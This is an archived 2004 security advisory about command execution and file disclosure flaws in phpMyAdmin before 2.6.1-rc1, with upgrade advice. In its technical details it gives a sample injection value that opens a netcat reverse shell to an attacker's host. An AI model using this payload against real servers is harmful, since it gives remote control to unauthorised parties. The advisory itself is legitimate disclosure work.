exploit the possibilities

phpMyAdmin261rc1.txt

phpMyAdmin261rc1.txt
Posted Dec 30, 2004
Authored by Nicolas Gregoire | Site exaprobe.com

phpMyAdmin versions prior to 2.6.1-rc1 suffer from command execution and file disclosure vulnerabilities.

tags | advisory, vulnerability
advisories | CVE-2004-1147, CVE-2004-1148
MD5 | d276543b1c17e03eb47b583955c9ef8f

phpMyAdmin261rc1.txt

Change Mirror Download
                                Exaprobe
www.exaprobe.com

Security Advisory

Advisory Name: Multiple vulnerabilities in phpMyAdmin
Release Date: 13 December 2004
Application: phpMyAdmin prior to 2.6.1-rc1
Platform: Any webserver running PHP
Severity: Remote code execution
Author: Nicolas Gregoire <ngregoire@exaprobe.com>
Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

- attacker need access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

CAN-2004-1147 Command execution in phpMyAdmin
CAN-2004-1148 File disclosure in phpMyAdmin

--
Nicolas Gregoire ----- Consultant en Sécurité des Systèmes d'Information
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    11 Files
  • 25
    Apr 25th
    15 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close